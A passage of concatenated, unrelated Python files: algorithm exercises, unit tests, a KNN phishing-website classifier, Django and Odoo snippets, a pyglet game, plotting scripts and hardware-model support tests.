+ self.F(x=x - self.step, y=y - self.step)
def __init__(self, *, amount: int, generator: RandomGenerator):
self.amount = amount
self.generator = generator
self._get_intervals()
self._get_distribution()
def generate(self):
while len(self.x_selection) < self.amount:
rand_x = self.generator.once()
rand_y = random()
p = self._F(x=rand_x, y=rand_y)
x, y = self._find_p(p)
self.x_selection.append(1 / self.amount * (x + 1))
self.y_selection.append(1 / self.amount * (y + 1))
def _find_p(self, p) -> (float, float):
pos = bisect_right(self.sorted_p, p)
return self.p_indexes[self.sorted_p[pos]]
def _get_intervals(self):
self.intervals.clear()
self.step = 1 / self.amount
right = self.step
while len(self.intervals) != self.amount:
self.intervals.append(right)
right += self.step
def _get_distribution(self):
self.distribution.clear()
self.p_indexes = {}
self.sorted_p = []
for i in range(0, self.amount):
self.distribution.append([])
for j in range(0, self.amount):
_x = self.intervals[i]
_y = self.intervals[j]
cur = self._F(x=_x, y=_y)
self.p_indexes[cur] = (i, j)
self.sorted_p.append(cur)
self.distribution[-1].append(cur)
self.sorted_p.sort()
def analise_crn():
conGen = MultiplicativeCongruentRandomGenerator(seed=60000607, m=87178291199, k=479001599)
c = CRNGenerator(generator=conGen)
c.generate(amount=10000)
create_histogram(seq=c.x_selection).show()
create_histogram(seq=c.y_selection).show()
mxl, mxr = m_confidence_interval(seq=c.x_selection)
myl, myr = m_confidence_interval(seq=c.y_selection)
dxl, dxr = d_confidence_interval(seq=c.x_selection)
dyl, dyr = d_confidence_interval(seq=c.y_selection)
print(f"{mxl} < mx < {mxr}")
print(f"{myl} < my < {myr}")
print(f"{dxl} < dx < {dxr}")
print(f"{dyl} < dy < {dyr}")
def analise_drn():
conGen = MultiplicativeCongruentRandomGenerator(seed=60000607, m=87178291199, k=479001599)
d = DRNGenerator(amount=100, generator=conGen)
d.generate()
create_histogram(seq=d.x_selection).show()
create_histogram(seq=d.y_selection).show()
mxl, mxr = m_confidence_interval(seq=d.x_selection)
myl, myr = m_confidence_interval(seq=d.y_selection)
dxl, dxr = d_confidence_interval(seq=d.x_selection)
dyl, dyr = d_confidence_interval(seq=d.y_selection)
print(f"{mxl} < mx < {mxr}")
print(f"{myl} < my < {myr}")
print(f"{dxl} < dx < {dxr}")
print(f"{dyl} < dy < {dyr}")
if __name__ == "__main__":
# analise_crn()
analise_drn()
|
from typing import List
from collections import defaultdict, deque
class Solution:
def orangesRotting(self, grid: List[List[int]]) -> int:
adj_list = defaultdict(list)
rotten_queue = deque() # (i, j, day)
fresh_set = set()
for i in range(len(grid)):
for j in range(len(grid[0])):
if grid[i][j] > 0:
if grid[i][j] == 1:
fresh_set.add((i, j))
if grid[i][j] == 2:
rotten_queue.appendleft(((i, j), 0))
for di, dj in [(1, 0), (0, 1), (-1, 0), (0, -1)]:
if 0 <= i + di < len(grid) and 0 <= j + dj < len(grid[0]):
if grid[i + di][j + dj] > 0:
adj_list[(i, j)].append((i + di, j + dj))
day = 0
while rotten_queue:
rotten, day = rotten_queue.pop()
for adj in adj_list[rotten]:
if adj in fresh_set:
fresh_set.remove(adj)
rotten_queue.appendleft((adj, day + 1))
if fresh_set:
return -1
return day
# Runtime: 60 ms, faster than 32.73% of Python3 online submissions for Rotting Oranges.
# Memory Usage: 13.9 MB, less than 52.18% of Python3 online submissions for Rotting Oranges.
|
# -*- coding: utf-8 -*-
"""
Unit Tests for low level training data ingestion.
Usage:
python -m unittest tests/test_ingest.py
"""
import sys
import unittest
import pandas as pd
sys.path.append('src')
sys.path.append("src/Mask_RCNN")
from config import GlobalConfig
import ingest
class IngestTest(unittest.TestCase):
@unittest.skip('Test depends on S3 access permissions.')
def test_get_s3_dcm(self):
bucket = GlobalConfig.get('S3_BUCKET_NAME')
imgdir = GlobalConfig.get('S3_STAGE1_TRAIN_IMAGE_DIR')
test_dcm_path = imgdir + '/0004cfab-14fd-4e49-80ba-63a80b6bddd6.dcm'
ds = ingest.get_s3_dcm(bucket=bucket, file_key=test_dcm_path)
self.assertEqual(ds.pixel_array.shape, (1024, 1024))
def test_parse_training_labels(self):
parsed = ingest.parse_training_labels(
train_box_df=pd.read_csv(GlobalConfig.get('EXAMPLE_TRAIN_BOX_PATH')),
train_image_dirpath=GlobalConfig.get('EXAMPLE_STAGE1_TRAIN_IMAGE_DIR'))
# Negative Case
self.assertEquals(
parsed['0004cfab-14fd-4e49-80ba-63a80b6bddd6'],
{'dicom': 'data/example/stage_1_train_images/0004cfab-14fd-4e49-80ba-63a80b6bddd6.dcm',
'label': 0,
'boxes': []})
# Positive Case
self.assertEquals(
parsed['00436515-870c-4b36-a041-de91049b9ab4'],
{'dicom': 'data/example/stage_1_train_images/00436515-870c-4b36-a041-de91049b9ab4.dcm',
'label': 1,
'boxes': [[264.0, 152.0, 213.0, 379.0], [562.0, 152.0, 256.0, 453.0]]})
if __name__ == '__main__':
unittest.main()
|
"""
1st approach
- sort the array
- create an array of meeting rooms
- each interval, compare the last meeting(since sorted) amongst the meeting in the meeting rooms
- if there is no collision, put the meeting in that room, else create a new meeting room for the interval
Time O(nlogn) sort
Space O(n) result array
84 ms, faster than 16.12%
"""
class Solution(object):
def minMeetingRooms(self, intervals):
"""
:type intervals: List[List[int]]
:rtype: int
"""
if len(intervals) == 0:
return 0
def cptr(a, b):
if a[0] == b[0]:
return a[1]-b[1]
return a[0]-b[0]
intervals = sorted(intervals, cmp=cptr)
rooms = [intervals[0]]
for i in range(1, len(intervals)):
cur = intervals[i]
found = False
for j in range(len(rooms)):
room = rooms[j]
if room[1] <= cur[0]:
rooms[j] = cur
found = True
break
if found == False:
rooms.append(cur)
return len(rooms)
"""
2nd approach
- sort the array
- create an array of last hour of occupied rooms
- each interval, compare the last meeting(since sorted) amongst the meeting in the meeting rooms
- if there is no collision, put the meeting in that room, else create a new meeting room for the interval
Time O(nlogn) sort
Space O(n) result array
84 ms, faster than 18.80%
"""
class Solution(object):
def minMeetingRooms(self, intervals):
"""
:type intervals: List[List[int]]
:rtype: int
"""
if len(intervals) == 0:
return 0
def cptr(a, b):
if a[0] == b[0]:
return a[1]-b[1]
return a[0]-b[0]
intervals = sorted(intervals, cmp=cptr)
lasts = [intervals[0][1]]
for i in range(1, len(intervals)):
cur = intervals[i]
found = False
for j in range(len(lasts)):
last = lasts[j]
if last <= cur[0]:
lasts[j] = max(last, cur[1])
found = True
break
if found == False:
lasts.append(cur[1])
return len(lasts)
|
import numpy as np
import pandas as pd
from collections import Counter
import random
import time
from scipy.io import arff
df = pd.read_csv('data.csv')
df=df.drop(columns=['id'])
start=time.time()
def k_nearest_neighbours(data,predict,k):
distances=[]
for group in data:
for features in data[group]:
euclid_distance=np.linalg.norm(np.array(features)-np.array(predict))
distances.append([euclid_distance,group])
#print(sorted(distances))
votes=[]
for i in sorted(distances)[:k]:
print(i)
votes.append(i[1])
#print(votes)
cnt=Counter(votes)
result=cnt.most_common(1)
#print(result)
return result[0][0]
df.fillna(-99999,inplace=True)
full_data=df.values.tolist()
#print(full_data)
#random.shuffle(full_data)
test_size=0.01
train_set={-1:[],1:[]}
test_set={-1:[],1:[]}
train_data=full_data[:-int(test_size*len(full_data))]
test_data=full_data[-int(test_size*len(full_data)):]
#print(test_data)
#train_data=train_data1[:6000]
#test_data=test_data1[:2000]
for i in train_data:
train_set[i[-1]].append(i[:-1])
for i in test_data:
test_set[i[-1]].append(i[:-1])
#print(len(full_data),len(train_data),len(test_data))
data=[-1,0,-1,1,-1,0,1,1,-1,1,1,-1,1,0,0,-1,-1,-1,0,-1,-1,-1,-1,-1,-1,-1,-1,1,-1,-1]
print("The website to be predicted has the following features")
print(data)
vote=k_nearest_neighbours(train_set,data,7)
print(vote)
if vote==1:
print("The website is Legitimate")
if vote==-1:
print("The webisite is a Phishing website")
correct=0
total=0
#finding the accuracy
for group in test_set:
for data in test_set[group]:
#print("reached")
vote=k_nearest_neighbours(train_set,data,7)
print(vote,group)
if group==vote:
correct=correct+1
total=total+1
accuracy=correct/total*100
print("Accuracy=",accuracy)
end=time.time()
print("Time elapsed=",round((end-start),2),"seconds") |
from odoo import models, fields, api, _
class AccountTax(models.Model):
_inherit = 'account.tax'
# NEW FIELDS
ewt_structure_id = fields.Many2one('account.ewt.structure', string='EWT Structure')
# EXTEND
amount_type = fields.Selection(selection=[('group', 'Group of Taxes'), ('fixed', 'Fixed'), ('percent', 'Percentage of Price'), ('division', 'Percentage of Price Tax Included'), ('base_deduction','Percentage of Price Tax Included Deduction - Custom')])
def _compute_amount(self, base_amount, price_unit, quantity=1.0, product=None, partner=None):
res = super(AccountTax, self)._compute_amount(base_amount, price_unit, quantity, product, partner)
if self.amount_type == 'base_deduction':
# base_amount = price_unit
# tax_amount = price_unit * self.amount / 100
return base_amount / 1.12 * self.amount / 100
return res
|
# coding: utf-8
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'Pinbot.settings'
from resumes.models import (
ContactInfoData,
ResumeData,
)
from feed.models import (
FeedResult,
)
from pin_utils.django_utils import (
get_oid,
)
def main():
resume_sid_list = list(ContactInfoData.objects.filter(
source='brick',
).values_list(
'resume_id',
flat=True,
))
resume_oid_list = [get_oid(i) for i in resume_sid_list]
ResumeData.objects.filter(
id__in=resume_oid_list
).update(
set__source='brick',
)
FeedResult.objects.filter(
resume__in=resume_oid_list
).update(
set__feed_source='brick',
)
if __name__ == '__main__':
main()
|
alien_color="green"
if alien_color=="green":
print("You get 5 points!")
alien_color="red"
if alien_color=="grenn":
print("You get 5 points!")
alien_color="grenn"
if alien_color=="green":
print("You get 5 points!")
else:
print("You get 10 points!")
alien_color = "grenn"
if alien_color != "green":
print("You get 10 points!")
else:
print("You get 5 points!")
alien_color="green"
if alien_color=="grenn":
print("You get 5 points!")
elif alien_color=="yellow":
print("You get 10 points!")
else:
print("You get 15 points!")
age=19
if age<2:
name="婴儿"
elif age<4:
name="正蹒跚学步"
elif age<13:
name="儿童"
elif age<20:
name="青少年"
elif age<65:
name="成年人"
else:
name="老年人"
print("你是一个"+name)
favorite_fruit=["apples","pears","peaches"]
if "apples" in favorite_fruit:
print("You really like apples!")
if "oranges" in favorite_fruit:
print("You rally like oranges!")
|
"""
Tests of this module depends on external connectivity and availability of
openstreetmap services.
"""
from conftest import REDIS_HOST, REDIS_PORT
from geocoding import geocoding
import copy
import geojson
import pytest
from exceptions.exceptions import InvalidNGSIEntity
def assert_lon_lat(entity, expected_lon, expected_lat):
assert 'location' in entity
assert entity['location']['type'] == 'geo:point'
lon, lat = entity['location']['value'].split(',')
assert float(lon) == pytest.approx(expected_lon, abs=1e-2)
assert float(lat) == pytest.approx(expected_lat, abs=1e-2)
def test_valid_address():
geocoding.is_valid_address(None, 10, None, None, None)[0] is False
geocoding.is_valid_address("Via San Gottardo", None, None, None, None)[
0] is False
geocoding.is_valid_address(None, None, None, None, None)[0] is False
geocoding.is_valid_address(None, None, None, None, "Italy")[0] is True
geocoding.is_valid_address(None, None, "Milan", None, None)[0] is True
geocoding.is_valid_address("Via San Gottardo", None, "Milan", None, None)[
0] is True
def test_non_dict_entity():
entity = "string"
try:
geocoding.add_location(entity)
except Exception as e:
assert isinstance(e, TypeError)
def test_empty_dict_entity():
entity = dict()
try:
geocoding.add_location(entity)
except Exception as e:
assert isinstance(e, InvalidNGSIEntity)
def test_no_address_entity():
entity = {
'id': 'test-id',
'type': 'test-type'
}
res = geocoding.add_location(entity)
assert 'address' not in res
assert 'location' not in res
def test_entity_with_location(air_quality_observed):
# Adding location to an entity with location does nothing
assert 'location' in air_quality_observed
old_entity = copy.copy(air_quality_observed)
r = geocoding.add_location(air_quality_observed)
assert r is air_quality_observed
assert r == old_entity
def test_entity_with_non_dict_address(air_quality_observed):
air_quality_observed.pop('location')
air_quality_observed['address']['value'] = "string address"
old_entity = copy.copy(air_quality_observed)
r = geocoding.add_location(air_quality_observed)
assert r is air_quality_observed
assert r == old_entity
def test_entity_add_point(air_quality_observed):
air_quality_observed.pop('location')
air_quality_observed['address']['value'] = {
"streetAddress": "IJzerlaan",
"postOfficeBoxNumber": "18",
"addressLocality": "Antwerpen",
"addressCountry": "BE",
}
r = geocoding.add_location(air_quality_observed)
assert r is air_quality_observed
assert_lon_lat(r, expected_lon=51.23, expected_lat=4.42)
def test_entity_add_point_negative_coord(air_quality_observed):
air_quality_observed.pop('location')
air_quality_observed['address']['value'] = {
"streetAddress": "Calle Acolman",
"postOfficeBoxNumber": "22",
"postalCode": "55120",
"addressLocality": "Ecatepec de Morelos",
"addressCountry": "MX",
}
r = geocoding.add_location(air_quality_observed)
assert r is air_quality_observed
assert_lon_lat(r, expected_lon=19.5411019, expected_lat=-99.0341571)
def test_entity_add_street_line(air_quality_observed):
air_quality_observed.pop('location')
air_quality_observed['address']['value'] = {
"streetAddress": "Acolman",
"addressLocality": "Ciudad de México",
"addressCountry": "MX",
}
r = geocoding.add_location(air_quality_observed)
assert r is air_quality_observed
assert 'location' in r
assert r['location']['type'] == 'geo:json'
geo = r['location']['value']
assert geo['type'] == 'LineString'
assert len(geo['coordinates']) > 1
def test_entity_add_city_shape(air_quality_observed):
air_quality_observed.pop('location')
air_quality_observed['address']['value'] = {
"addressCountry": "MX",
"addressLocality": "Ciudad de México",
}
r = geocoding.add_location(air_quality_observed)
assert r is air_quality_observed
assert 'location' in r
assert r['location']['type'] == 'geo:json'
geo = r['location']['value']
assert geo['type'] == 'Polygon'
polygon = geojson.Polygon(geo['coordinates'])
assert polygon.is_valid
def test_entity_add_country_shape(air_quality_observed):
air_quality_observed.pop('location')
air_quality_observed['address']['value'] = {
"addressCountry": "MX",
}
r = geocoding.add_location(air_quality_observed)
assert r is air_quality_observed
assert 'location' in r
assert r['location']['type'] == 'geo:json'
geo = r['location']['value']
assert geo['type'] == 'MultiPolygon'
multi_polygon = geojson.MultiPolygon(geo['coordinates'])
assert multi_polygon.is_valid
def test_multiple_entities(air_quality_observed):
entity_2 = copy.copy(air_quality_observed)
r = geocoding.add_locations([air_quality_observed, entity_2])
assert isinstance(r, list)
assert len(r) == 2
def test_caching(docker_redis, air_quality_observed, monkeypatch):
air_quality_observed.pop('location')
air_quality_observed['address']['value'] = {
"streetAddress": "IJzerlaan",
"postOfficeBoxNumber": "18",
"addressLocality": "Antwerpen",
"addressCountry": "BE",
}
from geocoding.geocache import temp_geo_cache
cache = next(temp_geo_cache(REDIS_HOST, REDIS_PORT))
assert len(cache.redis.keys('*')) == 0
try:
r = geocoding.add_location(air_quality_observed, cache=cache)
assert r is air_quality_observed
assert_lon_lat(r, expected_lon=51.23, expected_lat=4.42)
assert len(cache.redis.keys('*')) == 1
# Make sure no external calls are made
monkeypatch.delattr("requests.sessions.Session.request")
r.pop('location')
r = geocoding.add_location(air_quality_observed, cache=cache)
assert_lon_lat(r, expected_lon=51.23, expected_lat=4.42)
assert len(cache.redis.keys('*')) == 1
finally:
cache.redis.flushall()
def test_health():
geocoding.get_health()['status'] == 'pass'
|
from mk_livestatus import Socket
import json,subprocess,re,time,collections,sys,pymongo,os,datetime
from pymongo import MongoClient
mongoserver = "app161vm4.glam.colo"
mongoport = 27017
mydb = "inventory"
mycollections = {'ansible':"ansible",'check_mk':"cmk",'inventory':"inventory"}
cmkdict = collections.defaultdict(dict)
ansibledict = collections.defaultdict(dict)
inventorydict = collections.defaultdict(dict)
opdict = collections.defaultdict(dict)
mydc = {'colo':["nagios.glam.colo","/omd/sites/nagiosmon1/tmp/run/live"],'ggva':["nagios.ggva.glam.colo","/omd/sites/ggva_nagios/tmp/run/live"],'scl':["nagios.scl.glam.colo","/omd/sites/glam_ning/tmp/run/live"]}
#pip install python-mk-livestatus
#pip install pymongo
#import inventorydb_v4
import sys
def get_dbdata(host):
try:
conn = pymongo.MongoClient(mongoserver,mongoport)
print "Connected to MongoDB successfully"
except pymongo.errors.ConnectionFailure, e:
print "Could not connect to MongoDB: %s" % e
db = conn[mydb]
collname = "inventory"
collection = db[collname]
op = collection.find_one({'_id': host})
#count = collection.find({'_id':host}).count()
return op
op=get_dbdata(sys.argv[1])
print op
print type(op)
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('<int:receita_id>', views.receita, name='receita'),
path('buscar', views.buscar, name='buscar'),
path('cria/receita', views.cria_receita, name='cria_receita'),
path('deleta/<int:receita_id>', views.deleta_receita, name='deleta_receita'),
path('editar/<int:receita_id>', views.editar_receita, name='editar_receita'),
path('atualiza_receita', views.atualiza_receita, name='atualiza_receita')
] |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import atexit
import time
import json
import getopt
import sys
from client import Client
def check_game_status(game_state):
if game_state['finished']:
print(game_state['reason'])
exit(0)
def my_algo(game_state):
"""This function contains your algorithm for the game"""
"""
game state looks something like this
{
'stones_left': 4,
'current_max': 3,
'stones_removed': 3,
'finished': False,
'player_0': {'time_taken': 0.003, 'name': 'my name', 'resets_left': 2},
'player_1': {'time_taken': 13.149, 'name': 'b2', 'resets_left': 1},
'reset_used': True
'init_max': 3
}
"""
print(game_state)
time.sleep(0.1)
if game_state:
if game_state['stones_left'] < 10:
return 1, False
if game_state['stones_left'] < 20:
return 1, True
return 1, False
if __name__ == '__main__':
# Read these from stdin to make life easier
try:
opts, args = getopt.getopt(sys.argv[1:], 'fn:')
except getopt.GetoptError:
sys.stderr.write(__doc__)
exit(-1)
goes_first = False
for o, a in opts:
if o == '-f':
goes_first = True
ip = '127.0.0.1'
port = 9000
client = Client('Sephiroth', goes_first, (ip, port))
atexit.register(client.close)
stones = client.init_stones
resets = client.init_resets
if goes_first:
num_stones, reset = my_algo(None)
check_game_status(client.make_move(num_stones, reset))
while True:
game_state = client.receive_move()
check_game_status(game_state)
# Some parsing logic to convert game state to algo_inputs
num_stones, reset = my_algo(game_state)
print('You took %d stones%s' % (num_stones,
' and used reset.' if reset else '.'))
print('Current max: %d' % game_state['current_max'])
print('Stones left: %d' % game_state['stones_left'])
print('Player %s has %d resets left' % (game_state['player_0']['name'], game_state['player_0']['resets_left']))
print('Player %s has %d resets left' % (game_state['player_1']['name'], game_state['player_1']['resets_left']))
print('---------------------------------------')
if game_state['finished']:
print('Game over\n%s' % game_state['reason'])
exit(0)
check_game_status(client.make_move(num_stones, reset))
|
def isEven(number):
#generate list of even numbers
evenNumbers=[]
for i in range((number)):
evenNumbers.append(i*2)
if number in evenNumbers:
return True
else:
return False
print(isEven(100)) |
import statistics
data = [2.75, 1.75, 1.25, 0.25, 0.5, 1.25, 3.5]
statistics.mean(data) # 平均
# 1.6071428571428572
statistics.median(data) # 中央値
# 1.25
statistics.variance(data) # 分散
# 1.3720238095238095
|
import pyglet
from . import Player, Enemy, Bullet
pyglet.resource.path = ['./Assets']
pyglet.resource.reindex()
def centerImage(image):
"""Sets and image's anchor point to its center"""
image.anchor_x = image.width // 2
image.anchor_y = image.height // 2
def createBackground():
"""Creates the sprite for the background"""
background_image = pyglet.resource.image("Backgrounds/Nebula Blue.png")
background_sprite = pyglet.sprite.Sprite(img=background_image, x=0, y=0)
return background_sprite;
def createHarderBackground():
"""Creates the sprite for the background"""
background_image = pyglet.resource.image("Backgrounds/Nebula Aqua-Pink.png")
background_sprite = pyglet.sprite.Sprite(img=background_image, x=0, y=0)
return background_sprite;
def createHellBackground():
"""Creates the sprite for the background"""
background_image = pyglet.resource.image("Backgrounds/Nebula Red.png")
background_sprite = pyglet.sprite.Sprite(img=background_image, x=0, y=0)
return background_sprite;
def createPlayer():
"""Creates the sprite for the player"""
player_image = pyglet.resource.image("Sprites/Player.png")
centerImage(player_image)
player_sprite = pyglet.sprite.Sprite(img=player_image, x=1920 // 2, y=1080 // 2)
player_sprite.scale = 1
return player_sprite;
def createEnemy():
"""Creates the sprite for the enemy"""
enemy_image = pyglet.resource.image("Sprites/Enemy.png")
centerImage(enemy_image)
enemy_sprite = pyglet.sprite.Sprite(img=enemy_image, x=1920 // 2, y=1080 // 2)
enemy_sprite.scale = 1
return enemy_sprite;
def createBullet():
"""Creates the sprite for the bullet"""
bullet_image = pyglet.resource.image("Sprites/Bullet.png")
centerImage(bullet_image)
bullet_sprite = pyglet.sprite.Sprite(img=bullet_image, x=1920 // 2, y=1080 // 2)
bullet_sprite.scale = 1
return bullet_sprite
# Class for storing game resources
class Game():
def __init__(self):
# Labels
self.score_label = pyglet.text.Label(text="Score: 0", x=1920 // 2, y=1080 - 32)
self.round_label = pyglet.text.Label(text="Round: 1", x=32, y=32)
self.life_label = pyglet.text.Label(text="Lives: 3", x=32, y=64)
self.kills_label = pyglet.text.Label(text="Kills: 0", x=32, y=96)
# Sprites
self.background_sprite = createBackground()
self.player = Player.Player()
# Lists of stuff
self.enemy_list = []
self.enemy_count = 0
self.bullet_list = []
self.bullet_count = 0
self.objects = [self.player] + self.enemy_list + self.bullet_list
# Other game stuff
self.counter = 0
self.spawnRate = 1
self.difficulty = 1
self.stage = 1
self.score = 0
# Audio stuff
self.music = pyglet.resource.media('Sounds/Never Run.mp3')
self.gunshot = pyglet.media.StaticSource(pyglet.media.load('Assets/Sounds/Gunshot.wav'))
self.new_stage = pyglet.media.StaticSource(pyglet.media.load('Assets/Sounds/Guitar Riff.wav'))
def spawnEnemy(self, difficulty):
self.enemy = Enemy.Enemy(difficulty)
self.enemy_list.append(self.enemy)
def killEnemy(self, enemy):
self.enemy_index = self.objects.index(enemy) - 1
self.enemy_list.pop(self.enemy_index)
self.player.kills += 1
self.score += 100 * self.difficulty
def fireBullet(self):
self.gunshot.play()
self.bullet = Bullet.Bullet(self.player.sprite.rotation, self.player.sprite.x, self.player.sprite.y)
self.bullet_list.append(self.bullet)
def killBullet(self, bullet):
self.bullet_index = self.objects.index(bullet) - self.enemy_count - 1
self.bullet_list.pop(self.bullet_index)
def update(self, dt):
# Update the background if the difficulty gets high enough
if (self.difficulty > 10) and (self.stage != 2 or self.stage != 2):
if self.difficulty > 30 and self.stage != 3:
self.new_stage.play()
self.stage = 3
self.background_sprite = createHellBackground()
elif self.difficulty < 30 and self.new_stage != 2:
self.new_stage.play()
self.stage = 2
self.background_sprite = createHarderBackground()
# See if we need to spawn in an enemy
self.spawnRate = (1000/(self.score + 1))**(1/5)
self.counter += dt
if self.player.alive:
if self.counter > self.spawnRate:
self.spawnEnemy(self.difficulty)
self.counter = 0
self.difficulty += 1
# Update game objects list and counts
self.objects = [self.player] + self.enemy_list + self.bullet_list
self.enemy_count = len(self.enemy_list)
self.bullet_count = len(self.bullet_list)
# Update each object
for obj in self.objects:
# If the object is 'alive', update it normally
if obj.alive:
obj.update(dt, self.objects)
else:
# Get rid of bullets that aren't 'alive'
if obj.type == "bullet":
self.killBullet(obj)
# Get rid of enemies that aren't 'alive
elif obj.type == "enemy":
self.killEnemy(obj)
# Update labels
self.score_label.text = "Score: " + str(self.score)
self.life_label.text = "Lives: " + str(self.player.lives)
self.kills_label.text = "Kills: " + str(self.player.kills)
|
from django.contrib import admin
from .models import langkah, gambar_langkah
# Register your models here.
admin.site.register(langkah)
admin.site.register(gambar_langkah) |
import pytest
import os
import sys
import pickle
# If there is __init__.py in the directory where this file is, then Python adds das_decennial directory to sys.path
# automatically. Not sure why and how it works, therefore, keeping the following line as a double
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
try:
import nodes
except ImportError as e:
import programs.engine.nodes as nodes
def aNode():
return nodes.geounitNode(geocode='44', geocodeDict={2: 'State', 1: 'National'})
def test_nodes_slotsFrozen():
n = aNode()
with pytest.raises(AttributeError):
n.newAttribute = "This shouldn't work."
#def test_node_init(caplog):
def test_node_init():
n = nodes.geounitNode(geocode='4400700010111000', geocodeDict={16: 'Block', 12: 'Block_Group', 11: 'Tract', 5: 'County'})
assert n.parentGeocode == '440070001011'
assert n.geolevel == 'Block'
n = nodes.geounitNode(geocode='44', geocodeDict={16: 'Block', 12: 'Block_Group', 11: 'Tract', 5: 'County', 2: 'State'})
assert n.parentGeocode == '0'
assert n.geolevel == 'State'
with pytest.raises(AttributeError) as err:
nodes.geounitNode(geocode='44')
assert 'geocodeDict not provided for creation of geoUnitNode' in err.value
#assert 'geocodeDict not provided for creation of geoUnitNode' in caplog.text
def test_equal():
fname = os.path.join(os.path.dirname(__file__), 'geounitnode.pickle')
n1 = pickle.load(open(fname,'rb'))
n2 = pickle.load(open(fname,'rb'))
assert n1 == n2
if __name__ == "__main__":
test_nodes_slotsFrozen()
|
from matplotlib import pyplot as plt
import pandas as pd
plt.style.use("fivethirtyeight")
#df['py_dev_y']
ages_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]
dev_y = [38496, 42000, 46752, 49320, 53200,
56000, 62316, 64928, 67317, 68748, 73752]
fig, (ax, ax1) = plt.subplots(nrows = 2, ncols = 1, sharex = True)
ax.plot(ages_x, dev_y, color="#444444", label="All Devs")
py_dev_y = [45372, 48876, 53850, 57287, 63016,
65998, 70003, 70000, 71496, 75370, 83640]
ax.plot(ages_x, py_dev_y, color="#008fd5", label="Python")
js_dev_y = [37810, 43515, 46823, 49293, 53437,
56373, 62375, 66674, 68745, 68746, 74583]
ax.plot(ages_x, js_dev_y, color="#e5ae38", label="JavaScript")
data = {
"ages" : ages_x,
"Python": py_dev_y,
"JavaScript": js_dev_y
}
df = pd.DataFrame(data)
ax1.barh(["Python", "JavaScript"], [df["Python"].median(), df["JavaScript"].median()])
ax1.set_ylabel("Average Salary")
ax.legend()
ax.set_title("Median Salary (USD) by Age")
ax.set_xlabel("Ages")
ax.set_ylabel("Median Salary (USD)")
plt.tight_layout()
plt.show()
|
#using the led on the sense hat to display a user inputed message using left and right
import sense_hat, time, random
sense = sense_hat.SenseHat()
up_key = sense_hat.DIRECTION_UP
left_key = sense_hat.DIRECTION_DOWN
pressed = sense_hat.ACTION_PRESSED
message_right = input("Enter message for right joystick push:")
message_left = input("Enter message for left joystick push:")
time.sleep(1)
while True:
r = random.randint(0,255)
g = random.randint(0,255)
b = random.randint(0,255)
events = sense.stick.get_events()
if events:
for e in events:
print("starting loop")
if e.direction == up_key and e.action == pressed:
sense.show_message(message_right,text_colour=[r,g,b])
print("Joystick right press detected")
elif e.direction == left_key and e.action == pressed:
sense.show_message(message_left,text_colour=[r,g,b])
print("Joystick left press detected")
else:
print("Nothing detected")
|
# Copyright 2020 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the dpuv2-ultra96 supported operations"""
import os
import unittest
import numpy as np
from pyxir.graph.layer.xlayer import XLayer
from pyxir.target_registry import TargetRegistry
class TestUltra96OpSupport(unittest.TestCase):
target_registry = TargetRegistry()
@classmethod
def setUpClass(cls):
def test():
raise NotImplementedError("")
TestUltra96OpSupport.target_registry.register_target(
"dpuv2-ultra96", {}, test, test, test, test
)
@classmethod
def tearDownClass(cls):
# Unregister dpu for other tests
TestUltra96OpSupport.target_registry.unregister_target("dpuv2-ultra96")
# TestUltra96OpSupport.target_registry.unregister_target('DPUCZDX8G-ultra96')
def test_batchnorm_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import batchnorm_op_support
X = XLayer(
type=["BatchNorm"],
name="bn1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert batchnorm_op_support(X, [], [])
X = XLayer(
type=["BatchNorm"],
name="bn1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert not batchnorm_op_support(X, [], [])
def test_biasadd_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import biasadd_op_support
X = XLayer(
type=["BiasAdd"],
name="bn1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert biasadd_op_support(X, [], [])
X = XLayer(
type=["BiasAdd"],
name="bn1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert not biasadd_op_support(X, [], [])
def test_concat_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import concat_op_support
X = XLayer(
type=["Concat"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert concat_op_support(X, [], [])
X = XLayer(
type=["Concat"],
name="layer1",
shapes=[-1, 2570, 4, 4],
sizes=[2570 * 16],
bottoms=[],
tops=[],
targets=[],
attrs={"axis": 1},
)
assert not concat_op_support(X, [], [])
def test_conv2d_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import conv2d_op_support
X = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [1, 1], [1, 1]],
"channels": [4, 2],
"groups": 1,
},
)
assert conv2d_op_support(X, [], [])
X = XLayer(
type=["Convolution"],
name="layer1",
shapes=[-1, 2, 4, 4],
sizes=[32],
bottoms=[],
tops=[],
targets=[],
attrs={
"data_layout": "NCHW",
"kernel_size": [2, 2],
"strides": [1, 1],
"dilation": [1, 1],
"padding": [[0, 0], [0, 0], [3, 3], [1, 1]],
"channels": [4, 2],
"groups": 1,
},
)
assert not conv2d_op_support(X, [], [])
def test_conv2d_transpose_support(self):
from pyxir.contrib.dpuv2.ultra96_op_support import conv2d_transpose_op_support
